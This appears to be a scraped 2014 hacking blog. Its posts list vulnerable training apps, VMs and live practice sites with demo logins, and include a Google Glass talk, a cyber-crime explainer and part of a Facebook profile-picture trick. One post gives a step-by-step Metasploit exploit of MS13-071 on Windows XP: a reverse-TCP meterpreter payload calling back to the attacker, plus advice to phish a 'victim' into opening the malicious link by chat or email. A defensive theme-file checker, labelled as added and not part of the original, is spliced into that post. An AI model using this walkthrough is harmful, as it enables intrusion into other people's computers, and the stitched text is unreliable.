<li>The <b>BodgeIt Store</b> (Java): <a href="http://code.google.com/p/bodgeit/">http://code.google.com/p/bodgeit/</a> (<a href="http://code.google.com/p/bodgeit/downloads/list">download</a>)</li><br />
<br />
<li>OWASP <b>Bricks</b> (PHP): <a href="http://sechow.com/bricks/index.html">http://sechow.com/bricks/index.html</a> (<a href="http://sechow.com/bricks/download.html">download</a> & <a href="http://sechow.com/bricks/docs/">docs</a>)</li><br />
<br />
<li>The <b>ButterFly Security</b> Project (PHP): <a href="http://sourceforge.net/projects/thebutterflytmp/">http://sourceforge.net/projects/thebutterflytmp/</a> (<a href="http://sourceforge.net/projects/thebutterflytmp/files/">download</a>)</li><br />
<br />
<li><b>bWAPP</b> - an extremely buggy web application! (PHP): <a href="http://www.itsecgames.com/">http://www.itsecgames.com</a> (<a href="http://sourceforge.net/projects/bwapp/files/">download</a>) (<a href="http://itsecgames.blogspot.be/2013/01/bwapp-installation.html">docs</a>)</li><br />
<br />
<li>Damn Vulnerable Web Application - <b>DVWA</b> (PHP): <a href="http://www.dvwa.co.uk/">http://www.dvwa.co.uk</a> (<a href="http://code.google.com/p/dvwa/downloads/list">download</a>) </li><br />
<br />
<li>Damn Vulnerable Web Services - <b>DVWS</b> (PHP): <a href="http://dvws.secureideas.net/">http://dvws.secureideas.net</a> (<a href="http://dvws.secureideas.net/downloads/files/dvws.tgz">download</a>)</li><br />
<br />
<li>OWASP <b>Hackademic Challenges</b> Project (PHP): <a href="https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project">https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project</a> (<a href="https://code.google.com/p/owasp-hackademic-challenges/">download</a>)</li><br />
<br />
<li>Google <b>Gruyere</b> (Python): <a href="http://google-gruyere.appspot.com/">http://google-gruyere.appspot.com</a> (<a href="http://google-gruyere.appspot.com/gruyere-code.zip">download</a>)</li><br />
<br />
<li><b>Hacme Bank</b> (.NET): <a href="http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx">http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-bank.aspx">download</a>)</li><br />
<br />
<li><b>Hacme Books</b> (Java): <a href="http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx">http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmebooks.aspx">download</a>)</li><br />
<br />
<li><b>Hacme Casino</b> (Ruby on Rails): <a href="http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx">http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-casino.aspx">download</a>)</li><br />
<br />
<li><b>Hacme Shipping</b> (ColdFusion): <a href="http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx">http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmeshipping.aspx">download</a>)</li><br />
<br />
<li><b>Hacme Travel</b> (C++): <a href="http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx">http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx</a> (<a href="http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmetravel.aspx">download</a>)</li><br />
<br />
<li>OWASP <b>Insecure Web App</b> Project (Java): <a href="https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project">https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project</a> (<a href="http://sourceforge.net/projects/insecurewebapp/files/">download</a> - <i>orphaned</i>)</li><br />
<br />
<li><b>Mutillidae</b> (PHP): <a href="http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10">http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10</a> (<a href="http://www.irongeek.com/mutillidae/">download</a>)</li><br />
<br />
<li>OWASP <b>.NET Goat</b> (C#): <a href="https://owasp.codeplex.com/">https://owasp.codeplex.com</a> (<a href="https://owasp.codeplex.com/SourceControl/list/changesets#">download</a>)</li><br />
<br />
<li><b>Peruggia</b> (PHP): <a href="http://peruggia.sourceforge.net/">http://peruggia.sourceforge.net</a> (<a href="http://sourceforge.net/projects/peruggia/files/">download</a>)</li><br />
<br />
<li><b>Puzzlemall</b> (Java): <a href="https://code.google.com/p/puzzlemall/">https://code.google.com/p/puzzlemall/</a> (<a href="https://code.google.com/p/puzzlemall/downloads/list">download</a>) (<a href="https://code.google.com/p/puzzlemall/downloads/list">docs</a>)</li><br />
<br />
<li>Stanford <b>Securibench</b> (Java) & <a href="http://suif.stanford.edu/~livshits/work/securibench-micro/">Micro</a>: <a href="http://suif.stanford.edu/~livshits/securibench/">http://suif.stanford.edu/~livshits/securibench/</a> (<a href="http://suif.stanford.edu/~livshits/securibench/download.html">download</a>)</li><br />
<br />
<li><b>SQLI-labs</b> (PHP): <a href="https://github.com/Audi-1/sqli-labs">https://github.com/Audi-1/sqli-labs</a> (<a href="https://github.com/Audi-1/sqli-labs/archive/master.zip">download</a>) (<a href="http://dummy2dummies.blogspot.com/">blog</a>)</li><br />
<br />
<li><b>SQLol</b> (PHP): <a href="https://github.com/SpiderLabs/SQLol">https://github.com/SpiderLabs/SQLol</a> (<a href="https://github.com/SpiderLabs/SQLol/archive/master.zip">download</a>)</li><br />
<br />
<li>OWASP <b>Vicnum</b> Project (Perl & PHP): <a href="https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project">https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project</a> (<a href="http://sourceforge.net/projects/vicnum/files/">download</a>)</li><br />
<br />
<li><b>VulnApp</b> (.NET): <a href="http://www.nth-dimension.org.uk/blog.php?id=88">http://www.nth-dimension.org.uk/blog.php?id=88</a> (<a href="http://projects.nth-dimension.org.uk/dir?d=VulnApp">CVS download</a> & <a href="http://projects.nth-dimension.org.uk/rptview?rn=6">vulns</a>)</li><br />
<br />
<li><b>WackoPicko</b> (PHP): <a href="https://github.com/adamdoupe/WackoPicko">https://github.com/adamdoupe/WackoPicko</a> (<a href="https://github.com/adamdoupe/WackoPicko/zipball/master">download</a>) (<a href="http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf">whitepaper</a>)</li><br />
<br />
<li>OWASP <b>WebGoat</b> (Java): <a href="https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project">https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project</a> (<a href="http://code.google.com/p/webgoat/downloads/list">download</a>) (<a href="https://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents">guide</a>)</li><br />
<br />
<li>OWASP ZAP <b>WAVE</b> - Web Application Vulnerability Examples (Java): <a href="http://code.google.com/p/zaproxy/downloads/list">http://code.google.com/p/zaproxy/downloads/list</a></li><br />
<br />
<li><b>Wavsep</b> - Web Application Vulnerability Scanner Evaluation Project (Java): <a href="https://code.google.com/p/wavsep/">https://code.google.com/p/wavsep/</a> (<a href="https://code.google.com/p/wavsep/downloads/list">download</a>) (<a href="https://code.google.com/p/wavsep/downloads/list">docs</a>)</li><br />
<br />
<li><b>WIVET</b> - Web Input Vector Extractor Teaser: <a href="https://code.google.com/p/wivet/">https://code.google.com/p/wivet/</a> (<a href="http://www.webguvenligi.org/projeler/wivet">download</a>) (<a href="https://code.google.com/p/wivet/downloads/list?can=1&q=">tests</a>)</li><br />
<br />
<font color="blue"><h2>Virtual Machines (VMs) or ISO images</h2></font><br />
The following list references pre-installed and ready to use virtual machines (VMs) or ISO images that contain one or multiple vulnerable web applications to play with.<br />
<li><b>BadStore</b> (ISO): <a href="http://www.badstore.net/">http://www.badstore.net</a> (<a href="http://www.badstore.net/register.htm">download</a> - registration required)</li><br />
<br />
<li><b>Bee-Box</b> (bWAPP VMware): <a href="http://sourceforge.net/projects/bwapp/files/bee-box/">http://sourceforge.net/projects/bwapp/files/bee-box/</a></li><br />
<br />
<li>OWASP <b>BWA</b> - Broken Web Applications Project (VMware - <a href="http://code.google.com/p/owaspbwa/wiki/ProjectSummary">list</a>): <a href="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project">https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project</a> (<a href="http://code.google.com/p/owaspbwa/wiki/Downloads">download</a>)</li><br />
<br />
<li><b>Drunk Admin Web Hacking Challenge</b> (VMware): <a href="https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/">https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/</a> (<a href="http://bechtsoudis.com/data/challenges/drunk_admin_hacking_challenge.zip">download</a>) </li><br />
<br />
<li><b>Exploit.co.il</b> Vuln Web App (VMware): <a href="http://exploit.co.il/projects/vuln-web-app/">http://exploit.co.il/projects/vuln-web-app/</a> (<a href="http://sourceforge.net/projects/exploitcoilvuln/files/">download</a>)</li><br />
<br />
<li><b>GameOver</b> (VMware): <a href="http://sourceforge.net/projects/null-gameover/">http://sourceforge.net/projects/null-gameover/</a> (<a href="http://sourceforge.net/projects/null-gameover/files/">download</a>)</li><br />
<br />
<li><b>Hackxor</b> (VMware): <a href="http://hackxor.sourceforge.net/cgi-bin/index.pl">http://hackxor.sourceforge.net/cgi-bin/index.pl</a> (<a href="http://sourceforge.net/projects/hackxor/files/">download</a>) (<a href="http://hackxor.sourceforge.net/cgi-bin/hints.pl">hints&tips</a>)</li><br />
<br />
<li><b>Hacme Bank Prebuilt VM </b>(VMware): <a href="http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/">http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/</a> (<a href="http://dc121.4shared.com/download/wwPhUxMQ/hackme_bank_vm_Ninja-Sec.zip">download</a>)</li><br />
<br />
<li><b>Kioptrix4</b> (VMware & Hyper-V): <a href="http://www.kioptrix.com/blog/?p=604">http://www.kioptrix.com/blog/?p=604</a> (<a href="http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar">download</a>) </li><br />
<br />
<li><b>LAMPSecurity</b> (VMware): <a href="http://sourceforge.net/projects/lampsecurity/">http://sourceforge.net/projects/lampsecurity/</a> (<a href="http://sourceforge.net/projects/lampsecurity/files/">download</a>) (<a href="http://sourceforge.net/projects/lampsecurity/files/Documentation/">doc</a>)</li><br />
<br />
<li><b>Metasploitable</b> (VMware): <a href="http://blog.metasploit.com/2010/05/introducing-metasploitable.html">http://blog.metasploit.com/2010/05/introducing-metasploitable.html</a> (<a href="http://updates.metasploit.com/data/Metasploitable.zip.torrent">download</a> - torrent) (<a href="http://www.metasploit.com/learn-more/how-do-i-use-it/test-lab.jsp">doc</a>)</li><br />
<br />
<li><b>Metasploitable 2</b> (VMware): <br />
<a href="https://community.rapid7.com/docs/DOC-1875">https://community.rapid7.com/docs/DOC-1875</a> (<a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/">download</a>)</li><br />
<br />
<li><b>Moth</b> (VMware): <a href="http://www.bonsai-sec.com/en/research/moth.php">http://www.bonsai-sec.com/en/research/moth.php</a> (<a href="http://sourceforge.net/projects/w3af/files/moth/moth/">download</a>)</li><br />
<br />
<li><b>PentesterLab</b> - The Exercises (ISO & PDF): <a href="https://www.pentesterlab.com/exercises/">https://www.pentesterlab.com/exercises/</a> </li><br />
<br />
<li><b>PHDays I-Bank</b> (VMware): <br />
<a href="http://phdays.blogspot.com.es/2012/05/once-again-about-remote-banking.html">http://phdays.blogspot.com.es/2012/05/once-again-about-remote-banking.html</a> (<a href="http://downloads.phdays.com/phdays_ibank_vm.zip">download</a>)</li><br />
<br />
<li><b>Samurai WTF</b> (ISO - list): <a href="http://www.samurai-wtf.org/">http://www.samurai-wtf.org</a> (<a href="http://sourceforge.net/projects/samurai/files/">download</a>)</li><br />
<br />
<li><b>Sauron</b> (QEMU) [<i>Spanish</i>]: <a href="http://sg6-labs.blogspot.com/2007/12/secgame-1-sauron.html">http://sg6-labs.blogspot.com/2007/12/secgame-1-sauron.html</a> (<a href="http://sg6-labs.blogspot.com/search/label/SecGame">solutions</a>)</li><br />
<br />
<li><b>UltimateLAMP</b> (VMware - <a href="http://www.metasploit.com/learn-more/how-do-i-use-it/test-lab.jsp">list</a>): <a href="http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/">http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/</a> (<a href="http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip">download</a>)</li><br />
<br />
<li><b>Virtual Hacking Lab</b> (ZIP): <a href="http://sourceforge.net/projects/virtualhacking/">http://sourceforge.net/projects/virtualhacking/</a> (<a href="http://sourceforge.net/projects/virtualhacking/files/">download</a>)</li><br />
<br />
<li><b>Web Security Dojo</b> (VMware, VirtualBox - <a href="http://www.mavensecurity.com/web_security_dojo/">list</a>): <a href="http://www.mavensecurity.com/web_security_dojo/">http://www.mavensecurity.com/web_security_dojo/</a> (<a href="http://sourceforge.net/projects/websecuritydojo/files/">download</a>)</li><br />
<br />
You can have lots of fun with these, so why waste time? Download and get started now. Happy hacking :)<br />
Posted by Chandrakant<br />
<br />
Online | Live Sites For Practice Web Application Hacking Skills: <b>Part1</b><br />
Published 2014-01-29T23:27:00.000+05:30, updated 2014-01-29T23:39:24.077+05:30<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-khgFl3c3xco/UulAunCOE9I/AAAAAAAAFYc/VWXjE_qIfkY/s1600/hacker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="online live site to practice hacking skills" src="http://1.bp.blogspot.com/-khgFl3c3xco/UulAunCOE9I/AAAAAAAAFYc/VWXjE_qIfkY/s1600/hacker.jpg" /></a></div>Here is a list of websites that beginners always look for in order to polish their skills. At various places I encounter students and excited new security learners who ask me, "Is there any site available to practice all these hacking skills legally?"<br />
<br />
So here is a list of online sites where you can practice; it is completely safe. In the next post I will share how you can set up your own server on VMware and practice locally from your own computer.<br />
<br />
These are a few online and live vulnerable web applications available on the Internet to play with.<br />
<br />
<b>Acunetix:</b><br />
<a href="http://testasp.vulnweb.com">http://testasp.vulnweb.com</a> (Forum - ASP)<br />
<a href="http://testaspnet.vulnweb.com">http://testaspnet.vulnweb.com</a> (Blog - .NET)<br />
<a href="http://testphp.vulnweb.com">http://testphp.vulnweb.com</a> (Art shopping - PHP)<br />
<b>Cenzic CrackMeBank:</b> <a href="http://crackme.cenzic.com">http://crackme.cenzic.com</a><br />
<b>Google Gruyere (Python):</b> <a href="http://google-gruyere.appspot.com/start">http://google-gruyere.appspot.com/start</a><br />
<b>Hacking-Lab (eg. OWASP Top 10):</b> <a href="https://www.hacking-lab.com/events/registerform.html?eventid=245">https://www.hacking-lab.com/events/registerform.html?eventid=245</a><br />
<b>Hack.me (beta):</b> <a href="https://hack.me">https://hack.me</a><br />
<b>HackThisSite (HTS - Basic & Realistic (web) Missions):</b> <a href="http://www.hackthissite.org">http://www.hackthissite.org</a><br />
<b>Hackxor online demo:</b> <a href="http://hackxor.sourceforge.net/cgi-bin/login.pl">http://hackxor.sourceforge.net/cgi-bin/login.pl</a> (algo/smurf)<br />
<b>HP/SpiDynamics Free Bank Online: </b><a href="http://zero.webappsecurity.com">http://zero.webappsecurity.com</a> (admin/admin)<br />
<b>IBM/Watchfire AltoroMutual:</b> <a href="http://demo.testfire.net">http://demo.testfire.net</a> (jsmith/Demo1234)<br />
<b>NTOSpider Web Scanner Test Site: </b><a href="http://www.webscantest.com">http://www.webscantest.com</a> (testuser/testpass)<br />
<b>OWASP Hackademic Challenges Project - Live (PHP - Joomla):</b> <a href="http://hackademic1.teilar.gr">http://hackademic1.teilar.gr</a><br />
<b>Pentester Academy:</b> <a href="http://pentesteracademylab.appspot.com">http://pentesteracademylab.appspot.com</a>(One of my fav)<br />
<br />
Enjoy all these different vulnerable web environments and sharpen your web app pen-testing skills and tools by practicing with them.<br />
In the next part I will post the list of downloadable files which you can use to boost your hacking skills.<br />
Posted by Chandrakant<br />
<br />
Hack Windows XP PC (Theme Arbitrary Code Execution) with Kali Linux<br />
Published 2014-01-26T21:02:00.001+05:30, updated 2014-01-26T21:08:23.620+05:30<br />
<font color="blue"><b>Happy Republic Day to all Indians Proud of being Indian jai Hind!!!</b></font><br />
<br />
Today we will look at how an attacker can compromise a Windows XP system using an arbitrary code execution vulnerability. We are going to use Metasploit, which is present on Kali Linux; you can do the same with BackTrack. Technical description: a vulnerability exists in how Microsoft Windows XP and Windows 2003 handle the Screen Saver path in the [boot] section. An arbitrary path can be used as the screen saver, including a remote SMB resource, which allows remote code execution when a malicious .theme file is opened and the “Screen Saver” tab is viewed.<br />
<br />
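A defender can check .theme files for the condition described above before they reach users. The following is an added example, not code from the original post: it reads the [boot] section of a theme file and flags a screen saver entry that points to a remote resource. The key name SCRNSAVE.EXE comes from the Windows theme file format; the sample file contents, host name and the "local prefix" list are constructed assumptions.<br />

```python
import re

# Constructed sample .theme contents (INI format); host and file names are made up.
BENIGN_THEME = """\
; constructed sample
[Theme]
DisplayName=Sample

[boot]
SCRNSAVE.EXE=%WinDir%\\System32\\logon.scr
"""

SUSPICIOUS_THEME = """\
[Theme]
DisplayName=Sample

[Boot]
ScrnSave.exe = "\\\\fileserver.example\\share\\saver.scr"
"""

# Values that make Windows fetch the screen saver from another host.
REMOTE_PATTERNS = [
    (re.compile(r"^[\\/]{2}[^\\/]"), "UNC path (remote SMB resource)"),
    (re.compile(r"^[a-z][a-z0-9+.-]*://", re.I), "URL scheme"),
]
# Assumed policy for this example: screen savers normally live under the Windows directory.
LOCAL_PREFIXES = ("%systemroot%\\", "%windir%\\", "c:\\windows\\")


def screensaver_entries(theme_text):
    """Yield (line_number, value) for every SCRNSAVE.EXE key inside a [boot] section."""
    section = None
    for lineno, raw in enumerate(theme_text.lstrip("\ufeff").splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or INI comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()  # section names are case-insensitive
            continue
        if section == "boot" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "scrnsave.exe":
                yield lineno, value.strip().strip('"')


def audit_theme(theme_text):
    """Return a list of (line_number, severity, message) findings for one theme file."""
    findings = []
    for lineno, value in screensaver_entries(theme_text):
        if not value:
            continue  # no screen saver configured
        for pattern, label in REMOTE_PATTERNS:
            if pattern.search(value):
                findings.append((lineno, "remote", f"{label}: {value}"))
                break
        else:
            if not value.lower().startswith(LOCAL_PREFIXES):
                findings.append((lineno, "review", f"outside Windows directory: {value}"))
    return findings


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_THEME), ("suspicious", SUSPICIOUS_THEME)):
        print(name, audit_theme(text) or "no findings")
```

The same check can run on a mail gateway or file share scanner; anything reported as "remote" should be quarantined rather than opened.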
Let's carry out the attack practically. Here I have used Windows SP3 as the victim machine and Kali Linux as the attacker.<br />
Follow it step by step:<br />
<li>Open a terminal in Kali Linux and type <b>msfconsole</b>.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-OXLjFy3Y4-E/UuUn4N2uftI/AAAAAAAAFXA/3XjxdFXrURM/s1600/msfconsole.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="msfconsole on kali" src="http://2.bp.blogspot.com/-OXLjFy3Y4-E/UuUn4N2uftI/AAAAAAAAFXA/3XjxdFXrURM/s720/msfconsole.png" height="400" width="580" /></a></div><br />
<li>Now type the following commands one by one:<br />
<br />
<li><b>use exploit/windows/fileformat/ms13_071_theme</b><br />
<br />
<li><b>msf exploit (ms13_071_theme)>set payload windows/meterpreter/reverse_tcp</b><br />
<br />
<li><b>msf exploit (ms13_071_theme)>set lhost 192.168.223.133 </b><br />
(the IP of your Kali machine; to find it, type <b>ifconfig</b> in a new terminal)<br />
<li><b>msf exploit (ms13_071_theme)>set srvhost 192.168.223.133</b> <br />
<br />
<li><b>msf exploit (ms13_071_theme)>exploit</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-OJ5G_Q_q2to/UuUowNd_H1I/AAAAAAAAFXI/rvm2DTOcDFw/s1600/exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Exploit to hack windows xp system" src="http://1.bp.blogspot.com/-OJ5G_Q_q2to/UuUowNd_H1I/AAAAAAAAFXI/rvm2DTOcDFw/s720/exploit.png" height="400" width="580" /></a></div><br />
Once all this is done, you need to give your victim <b>\\192.168.1.3:gCzJXDKtJugDsVFC.scr</b> via chat, email or any social engineering technique you can use. Once the victim opens the URL you provided, he will be asked to confirm opening the link.<br />
As soon as the victim clicks Run, you will have your meterpreter shell open.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-l09yif0SBog/UuUpr5dVdhI/AAAAAAAAFXY/RpjqtGtasPo/s1600/send+link.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Confirmation for un" src="http://2.bp.blogspot.com/-l09yif0SBog/UuUpr5dVdhI/AAAAAAAAFXY/RpjqtGtasPo/s420/send+link.png" /></a></div>Now you have access to the victim's PC. Use “<b>sessions -l</b>” to get the session number, and then type “<b>sessions -i ID</b>” to connect to the session.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-4b-m1_2AkGo/UuUpnKh13XI/AAAAAAAAFXQ/sNeh4eJJcBI/s1600/hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Hacked into Windows XP system" src="http://2.bp.blogspot.com/-4b-m1_2AkGo/UuUpnKh13XI/AAAAAAAAFXQ/sNeh4eJJcBI/s820/hacked.png" height="500" width="600" /></a></div>Enjoy hacking, be safe and keep learning.<br />
<br />
<br />
Posted by Chandrakant<br />
<br />
Google Glass Hacks: Fun and Frightening use Presentation<br />
Published 2014-01-19T01:16:00.001+05:30, updated 2014-01-19T01:22:05.352+05:30<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kVXe0lM1bas/UtrZ6E5gS_I/AAAAAAAAFWk/ZA0NiZ0ZcoI/s1600/googleglass.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Google Glass Hacks" src="http://3.bp.blogspot.com/-kVXe0lM1bas/UtrZ6E5gS_I/AAAAAAAAFWk/ZA0NiZ0ZcoI/s1600/googleglass.jpeg" /></a></div>Here is a nice video presentation on Google Glass hacks. This technical lecture covers lots of things, from machine learning and AI to hardware design and manufacture. It includes demonstrations of applications enabled by an always-on image capturing wearable computer. You'll leave with a clear understanding of the field's status quo, how we got here, and insight into what's around the corner.<br />
Always-on camera enabled wearable computers, like Google Glass and Lambda Hat, enable a variety of slightly creepy, but undeniably useful applications. For the past few months, I've worn a computing device that takes pictures every few seconds. I run facial detection over the image stream, pulling out every face I have seen. Soon, we'll be able to conduct mass facial recognition using this data. Other applications include detecting license plates and automatically uploading them to a public GPS tagged website. This talk will cover the history, state of the art, and future of wearable computing, machine learning, and the privacy implication of this technology.<br />
<br />
Video <br />
======<br />
<iframe width="560" height="315" src="//www.youtube.com/embed/PnXGb7RHXWQ" frameborder="0" allowfullscreen></iframe><br />
<a href="https://events.ccc.de/congress/2013/wiki/Main_Page">Source</a><br />
It deserves a share for its useful information and great presentation; every geek should watch it.<br />
Posted by Chandrakant<br />
<br />
Cyber Crime And Rules On Internet Be Safe<br />
Published 2014-01-14T03:03:00.003+05:30, updated 2014-01-14T03:04:55.028+05:30<br />
<div class="center"><a href="http://2.bp.blogspot.com/-QyHLYeH1EHM/UtRa5pdBk8I/AAAAAAAAFU0/1plHsL7rJV0/s1600/cyber+.jpg"><br />
<img alt="Cyber Crime And Rules" height="399" src="http://2.bp.blogspot.com/-QyHLYeH1EHM/UtRa5pdBk8I/AAAAAAAAFU0/1plHsL7rJV0/s1600/cyber+.jpg" width="520" /><br />
</a><br />
<span>Cyber Crime And Rules That You Should Know</span><br />
</div>As the days progress, use of computers and the internet has increased rapidly among people. With the growing popularity of the internet, or World Wide Web, there is also growth in crime specific to the cyber world. People are getting smart enough to steal someone's credentials and perform various actions with them, such as bank account transactions or breaking into social network accounts.<br />
Everyone who uses the internet is a potential victim. In the enforcement of these criminal offenses, it is imperative to incarcerate the small percentage who are criminal users and to protect the majority of users who are innocent. There is a broad spectrum of computer and internet crimes and they are often covered by both state and federal laws.<br />
<br />
Computer offences can be defined as a crime in which a computer, or a network of computers, are used in the commission of the crime. If an individual takes advantage of the internet in the commission of a crime, this is sometimes called a net-crime.<br />
<br />
The direct victim of a computer crime can either be the computer, or network, itself. These crimes can victimize something independent of the network such as a consumer by simply using a computer during the crime.<br />
<br />
Crimes that target computers specifically include things such as the implementation of computer viruses. Another type of this crime is sometimes referred to as a denial-of-service attack which is aimed at bringing down a particular network. The introduction of malware to a network is also a direct attack on a computer. Examples of malware are trojan horses and spyware. These are forms of unwanted software which infect a computer and are also referred to as a computer contaminant.<br />
Cyber terrorism is a form of this type of crime in which the perpetrator attempts to bring down a large scale computer network to interrupt its users and create panic.<br />
<br />
Examples of computer crimes with independent victims are cyberstalking, identity theft, and phishing.<br />
<br />
Some other common examples that are often publicized in the media are the distribution of child pornography and hate propaganda. Cyber terrorism and those distributing hate propaganda are directly linked because they are often perpetrated by the same organization or organizations with similar goals.<br />
<br />
With such a variety of offenses related to the cyber world, many worry that they will be subject to prosecution if they wander into an inappropriate website or inadvertently spread malware. The truth of the matter is that in the majority of state and federal statutes regulating computer crimes, the laws are written specifically to target those who indicate that they "knowingly" and/or "willingly" perpetrated one of these offenses.<br />
<br />
The agents who investigate these crimes, along with the prosecutor, carry the burden of showing that a person had the intent to commit the computer crime. A knowledgeable criminal lawyer can provide the expertise to defend those who may find themselves prosecuted for something that they did not have the intent to commit.<br />
<br />
So let's make the cyber world crime-free and better for everyone's use and benefit.<br />
Posted by Chandrakant<br />
<br />
Facebook Hack to Make Different Profile Picture and Thumbnails<br />
Published 2014-01-05T16:24:00.000+05:30, updated 2014-01-14T03:09:37.392+05:30<br />
Hi all, here is a small trick that you can use to show two different Facebook profile pictures. It is just a small photo-ID-related hack that makes it look cool. Let's do it.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-I1BIhxd9hw0/Usk558QQ2iI/AAAAAAAAFUk/sC-0azmsogU/s1600/facebook+hack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-I1BIhxd9hw0/Usk558QQ2iI/AAAAAAAAFUk/sC-0azmsogU/s520/facebook+hack.png" /></a></div><b>Follow it step wise </b> <br />
<br />
<li>First of all, choose an image that you want to use as the different profile picture.<br />
<br />
<a href="https://www.facebook.com/me/photos_albums">Get your own photo albums</a><br />
It will open your "Profile Pictures" album. Click any picture you want to use as another profile picture.<br />
<br />
<li>After opening (clicking) your chosen profile image, look at the URL and copy the "fbid" value; mine here is: 250571248304537<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-QE0Ka58OZKM/Usk0WTa_5_I/AAAAAAAAFT0/UTjq2z1gurg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="facebook hack on image change" src="http://2.bp.blogspot.com/-QE0Ka58OZKM/Usk0WTa_5_I/AAAAAAAAFT0/UTjq2z1gurg/s320/1.png" /></a></div><br />
<li>Carefully from here, go to your Facebook account, click your profile picture and choose "Edit Thumbnail".<br />
A pop-up window will appear.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-hlI-H5n7G-k/Usk1PvcYmCI/AAAAAAAAFT8/qC2Svmlz4vg/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-hlI-H5n7G-k/Usk1PvcYmCI/AAAAAAAAFT8/qC2Svmlz4vg/s320/2.png" /></a></div>Now right click and inspect element .<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-NBSZ0zMgTTg/Usk15P19QDI/AAAAAAAAFUE/Ni2viB3L7Bo/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NBSZ0zMgTTg/Usk15P19QDI/AAAAAAAAFUE/Ni2viB3L7Bo/s320/3.png" /></a></div><li>Here comes the important step. Scroll down until you reach the code which starts with: <br />
<a href="http://4.bp.blogspot.com/-MxWOdFJ7UHw/UtRc9FFjrnI/AAAAAAAAFVA/-b8ce4Bzj7w/s1600/one.png" imageanchor="1" ><img border="0" src="http://4.bp.blogspot.com/-MxWOdFJ7UHw/UtRc9FFjrnI/AAAAAAAAFVA/-b8ce4Bzj7w/s1600/one.png" /></a><br />
Click the left small arrow to open the code and scroll down a bit until you find this code : <br />
<br />
<a href="http://3.bp.blogspot.com/-BCv2BXf-TCc/UtRdDoQxIEI/AAAAAAAAFVI/EI8tomnxu7Y/s1600/12334.png" imageanchor="1" ><img border="0" src="http://3.bp.blogspot.com/-BCv2BXf-TCc/UtRdDoQxIEI/AAAAAAAAFVI/EI8tomnxu7Y/s1600/12334.png" /></a><br />
